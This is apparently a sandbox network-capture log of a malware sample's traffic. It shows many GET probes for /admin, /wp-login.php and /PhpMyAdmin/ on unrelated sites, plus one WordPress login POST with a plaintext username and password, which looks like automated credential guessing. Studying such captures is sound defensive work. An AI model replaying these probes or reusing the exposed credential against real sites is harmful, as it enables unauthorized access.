lang="it" style="visibility:hidden;opacity:0;"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>La pagina non sta
2024-02-20 23:26:24 UTC	16384	IN	Data Raw: 34 37 2c 30 6c 30 2c 32 31 2e 33 31 6c 36 2e 36 32 34 2c 30 6c 30 2c 2d 31 30 2e 35 36 36 63 30 2c 2d 32 2e 37 38 39 20 30 2e 35 31 35 2c 2d 35 2e 34 38 38 20 33 2e 39 37 38 2c 2d 35 2e 34 38 38 63 33 2e 34 36 33 2c 30 20 33 2e 34 32 37 2c 33 2e 31 39 37 20 33 2e 34 32 37 2c 35 2e 36 36 35 6c 30 2c 31 30 2e 33 38 39 6c 36 2e 36 32 34 2c 30 6c 30 2c 2d 31 31 2e 37 32 31 63 30 2c 2d 35 2e 37 33 36 20 2d 31 2e 32 32 35 2c 2d 31 30 2e 31 35 37 20 2d 37 2e 39 33 38 2c 2d 31 30 2e 31 35 37 5a 6d 2d 32 30 2e 31 39 31 2c 2d 31 30 2e 30 38 37 63 2d 30 2e 30 30 36 2c 30 20 2d 30 2e 30 31 32 2c 30 20 2d 30 2e 30 31 37 2c 30 63 2d 32 2e 31 31 34 2c 30 20 2d 33 2e 38 35 34 2c 31 2e 37 34 20 2d 33 2e 38 35 34 2c 33 2e 38 35 34 63 30 2c 32 2e 31 31 33 20 31 2e 37 34 2c Data Ascii: 47,0l0,21.31l6.624,0l0,-10.566c0,-2.789 0.515,-5.488 3.978,-5.488c3.463,0 3.427,3.197 3.427,5.665l0,10.389l6.624,0l0,-11.721c0,-5.736 -1.225,-10.157 -7.938,-10.157Zm-20.191,-10.087c-0.006,0 -0.012,0 -0.017,0c-2.114,0 -3.854,1.74 -3.854,3.854c0,2.113 1.74,
2024-02-20 23:26:25 UTC	16384	IN	Data Raw: 2e 32 63 2d 32 2e 30 38 33 2c 30 20 2d 33 2e 38 34 32 2c 31 2e 33 34 31 20 2d 34 2e 35 30 34 2c 33 2e 32 6c 2d 35 2e 33 39 2c 30 63 2d 30 2e 36 36 34 2c 2d 31 2e 38 35 39 20 2d 32 2e 34 32 33 2c 2d 33 2e 32 20 2d 34 2e 35 30 36 2c 2d 33 2e 32 63 2d 32 2e 30 38 33 2c 30 20 2d 33 2e 38 34 32 2c 31 2e 33 34 31 20 2d 34 2e 35 30 34 2c 33 2e 32 6c 2d 31 2e 38 39 36 2c 30 6c 30 2c 2d 31 2e 36 63 30 2c 2d 31 2e 37 36 36 20 31 2e 34 33 35 2c 2d 33 2e 32 20 33 2e 32 2c 2d 33 2e 32 6c 32 32 2e 32 37 32 2c 30 63 30 2e 30 37 35 2c 30 2e 35 32 35 20 30 2e 31 32 38 2c 31 2e 30 35 36 20 30 2e 31 32 38 2c 31 2e 36 6c 30 2c 33 2e 32 5a 22 0a 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 22 20 2f 3e 0a 20 20 20 20 Data Ascii: .2c-2.083,0 -3.842,1.341 -4.504,3.2l-5.39,0c-0.664,-1.859 -2.423,-3.2 -4.506,-3.2c-2.083,0 -3.842,1.341 -4.504,3.2l-1.896,0l0,-1.6c0,-1.766 1.435,-3.2 3.2,-3.2l22.272,0c0.075,0.525 0.128,1.056 0.128,1.6l0,3.2Z" style="fill-rule:nonzero;" />
2024-02-20 23:26:25 UTC	16384	IN	Data Raw: 22 4d 32 32 2e 34 32 2c 30 6c 36 2e 36 37 31 2c 36 2e 36 37 31 6c 30 2c 32 32 2e 34 32 63 30 2c 31 2e 36 30 36 20 2d 31 2e 33 30 35 2c 32 2e 39 30 39 20 2d 32 2e 39 30 39 2c 32 2e 39 30 39 6c 2d 32 30 2e 33 36 34 2c 30 63 2d 31 2e 36 30 34 2c 30 20 2d 32 2e 39 30 39 2c 2d 31 2e 33 30 33 20 2d 32 2e 39 30 39 2c 2d 32 2e 39 30 39 6c 30 2c 2d 32 36 2e 31 38 32 63 30 2c 2d 31 2e 36 30 34 20 31 2e 33 30 35 2c 2d 32 2e 39 30 39 20 32 2e 39 30 39 2c 2d 32 2e 39 30 39 6c 31 36 2e 36 30 32 2c 30 5a 6d 33 2e 37 36 33 2c 32 39 2e 30 39 31 6c 2d 30 2e 30 30 31 2c 2d 32 30 2e 33 36 34 6c 2d 35 2e 38 31 38 2c 30 6c 30 2c 2d 35 2e 38 31 38 6c 2d 31 34 2e 35 34 36 2c 30 6c 30 2c 32 36 2e 31 38 32 6c 32 30 2e 33 36 35 2c 30 5a 6d 2d 31 33 2e 30 39 32 2c 2d 32 2e 39 30 39 Data Ascii: "M22.42,0l6.671,6.671l0,22.42c0,1.606 -1.305,2.909 -2.909,2.909l-20.364,0c-1.604,0 -2.909,-1.303 -2.909,-2.909l0,-26.182c0,-1.604 1.305,-2.909 2.909,-2.909l16.602,0Zm3.763,29.091l-0.001,-20.364l-5.818,0l0,-5.818l-14.546,0l0,26.182l20.365,0Zm-13.092,-2.909
2024-02-20 23:26:25 UTC	16384	IN	Data Raw: 68 72 65 66 3d 22 2f 64 69 64 61 74 74 69 63 61 2f 6f 66 66 65 72 74 61 2d 66 6f 72 6d 61 74 69 76 61 22 20 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 3e 4f 66 66 65 72 74 61 20 66 6f 72 6d 61 74 69 76 61 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 64 69 64 61 74 74 69 63 61 2f 73 63 68 65 64 65 22 20 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 3e 4c 65 20 73 63 68 65 64 65 20 64 69 64 61 74 Data Ascii: href="/didattica/offerta-formativa" tabindex="-1">Offerta formativa</a> </li> <li > <a href="/didattica/schede" tabindex="-1">Le schede didat
2024-02-20 23:26:25 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 61 64 67 65 20 62 61 64 67 65 2d 73 6d 20 62 61 64 67 65 2d 70 69 6c 6c 20 62 61 64 67 65 2d 6f 75 74 6c 69 6e 65 2d 70 72 69 6d 61 72 79 22 20 6e 61 6d 65 3d 22 63 65 72 63 61 22 20 76 61 6c 75 65 3d 22 41 6c 75 6e 6e 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 41 6c 75 6e 6e 69 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a Data Ascii: <button type="submit" class="badge badge-sm badge-pill badge-outline-primary" name="cerca" value="Alunni"> Alunni </button>
2024-02-20 23:26:25 UTC	16334	IN	Data Raw: 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 41 6c 62 6f 20 6f 6e 6c 69 6e 65 20 2d 20 6c 69 6e 6b 20 65 73 74 65 72 6e 6f 20 2d 20 61 70 65 72 74 75 72 61 20 6e 75 6f 76 61 20 73 63 68 65 64 61 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 63 6f 6e 20 64 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 69 6d 67 2d 66 6c 75 69 64 22 20 61 6c 74 3d 22 41 6c 62 6f 20 6f 6e 6c 69 6e 65 22 20 73 72 63 3d 22 2f 61 6c 6c 65 67 61 74 69 2f 62 61 Data Ascii: ener noreferrer" aria-label="Albo online - link esterno - apertura nuova scheda"> ... <div class="icon d-inline-block"> <img class="img-fluid" alt="Albo online" src="/allegati/ba
2024-02-20 23:26:25 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
325	192.168.2.6	60439	217.26.61.200	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:24 UTC	164	OUT	GET /admin HTTP/1.1 Host: eskimo.ch Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:25 UTC	458	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:24 GMT Server: Apache Set-Cookie: PHPSESSID=3ktuv7vq6r7vknqksmdr62djrvb9sdim; path=/ Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Link: <https://eskimo.ch/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-02-20 23:26:25 UTC	7734	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 2d 43 48 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 20 3e 3c 21 2d 2d 20 47 6c 6f 62 61 6c 20 73 69 74 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 4b 35 32 4d 59 4b 4c 43 48 45 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 Data Ascii: 2000<!DOCTYPE html><html dir="ltr" lang="de-CH" prefix="og: https://ogp.me/ns#"><head >... Global site tag (gtag.js) - Google Analytics --><script async src="https://www.googletagmanager.com/gtag/js?id=G-K52MYKLCHE"></script><script> window.dataLay
2024-02-20 23:26:25 UTC	464	IN	Data Raw: 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 2e 32 35 65 6d 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 37 35 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 Data Ascii: entColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:re
2024-02-20 23:26:25 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:25 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 70 6c 61 69 6e 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 6c 61 62 65 6c 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 70 61 64 64 69 6e 67 3a 2e 33 37 35 65 6d 20 2e 36 32 35 65 6d 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 67 72 6f 75 70 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 29 7b 70 61 64 64 69 6e 67 3a 31 2e Data Ascii: 2000.wp-block-quote.is-style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-group.has-background){padding:1.
2024-02-20 23:26:25 UTC	6	IN	Data Raw: 2d 77 70 2d 2d 70 Data Ascii: -wp--p
2024-02-20 23:26:25 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:25 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 69 74 65 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 Data Ascii: 2000reset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{borde
2024-02-20 23:26:25 UTC	6	IN	Data Raw: 74 2d 64 69 76 69 Data Ascii: t-divi
2024-02-20 23:26:25 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:25 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 64 65 72 7b 2d 2d 64 69 76 69 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 73 65 63 6f 6e 64 61 72 79 20 29 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 64 69 76 69 64 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 64 69 76 69 64 65 72 5f 5f 74 65 78 74 7b 63 6f 6c 6f 72 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 73 65 63 6f 6e 64 61 72 79 20 29 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 74 79 70 6f 67 72 61 70 68 79 2d 73 65 63 6f 6e 64 61 72 79 2d 66 6f 6e 74 2d 66 61 6d 69 6c 79 20 29 2c 20 53 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d Data Ascii: 2000der{--divider-color:var( --e-global-color-secondary );}.elementor-widget-divider .elementor-divider__text{color:var( --e-global-color-secondary );font-family:var( --e-global-typography-secondary-font-family ), Sans-serif;font-weight:var( --e-global-

Session ID	Source IP	Source Port	Destination IP	Destination Port
326	192.168.2.6	60496	86.105.245.69	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:24 UTC	175	OUT	GET /admin HTTP/1.1 Host: www.stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:24 UTC	355	IN	HTTP/1.1 302 Found Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=q2ph1u7ied1kb5jksttv46bm67; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache location: /
2024-02-20 23:26:24 UTC	11	IN	Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
327	192.168.2.6	60744	162.0.235.125	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:24 UTC	354	OUT	POST /wp-login.php HTTP/1.1 Host: norwegischlernen.info Accept: / Accept-Encoding: deflate, gzip Cookie: wordpress_test_cookie=WP+Cookie+check User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://norwegischlernen.info/wp-login.php Content-Length: 147 Content-Type: application/x-www-form-urlencoded
2024-02-20 23:26:24 UTC	147	OUT	Data Raw: 6c 6f 67 3d 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 26 70 77 64 3d 46 75 63 6b 6d 79 6c 69 66 65 31 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=norwegischlernen&pwd=Fuckmylife1&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Fnorwegischlernen.info%2Fwp-admin%2F&testcookie=1
2024-02-20 23:26:24 UTC	408	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 set-cookie: wordpress_test_cookie=WP+Cookie+check; path=/; secure x-frame-options: SAMEORIGIN content-length: 5777 date: Tue, 20 Feb 2024 23:26:24 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-02-20 23:26:24 UTC	5777	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; norwegischlernen.info — WordPress</title><meta name='robots' content='max-image-preview:large, noindex, noa

Session ID	Source IP	Source Port	Destination IP	Destination Port
328	192.168.2.6	60747	86.105.245.69	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:24 UTC	216	OUT	GET / HTTP/1.1 Host: www.stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip Cookie: PHPSESSID=2ppcq4e78r9u2d410k2iavqo3n User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:24 UTC	360	IN	HTTP/1.1 301 Moved Permanently Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: https://sell.sawbrokers.com/domain/stylesense.co.uk/
2024-02-20 23:26:24 UTC	13	IN	Data Raw: 33 0d 0a 20 20 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 3 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
329	192.168.2.6	60815	75.2.70.75	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:24 UTC	166	OUT	GET /admin HTTP/1.1 Host: eyegage.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:24 UTC	177	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:24 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.eyegage.com/admin
2024-02-20 23:26:24 UTC	166	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
330	192.168.2.6	60809	51.159.190.167	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:24 UTC	179	OUT	GET /wp-login.php HTTP/1.1 Host: cabinet-orsika.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:25 UTC	446	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 20 Feb 2024 23:26:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.27 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure Vary: Accept-Encoding X-Cache-Status: MISS X-Powered-By: PleskLin
2024-02-20 23:26:25 UTC	8725	IN	Data Raw: 31 63 66 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 53 65 20 63 6f 6e 6e 65 63 74 65 72 20 26 6c 73 61 71 75 6f 3b 20 44 72 20 44 6f 6e 20 50 69 65 72 72 65 20 4f 72 73 69 6e 69 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 Data Ascii: 1cf4<!DOCTYPE html><html lang="fr-FR"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Se connecter &lsaquo; Dr Don Pierre Orsini — WordPress</title><meta name='robots' content='noindex, follow' /><link

Session ID	Source IP	Source Port	Destination IP	Destination Port
331	192.168.2.6	60834	51.159.190.167	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:24 UTC	182	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: www.cabinet-orsika.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:26 UTC	358	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.27 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.cabinet-orsika.fr/wp-json/>; rel="https://api.w.org/"
2024-02-20 23:26:26 UTC	16026	IN	Data Raw: 31 64 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 Data Ascii: 1d1b<!DOCTYPE html><html lang="fr-FR"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <meta name='robots' content='noindex, follow' />... T
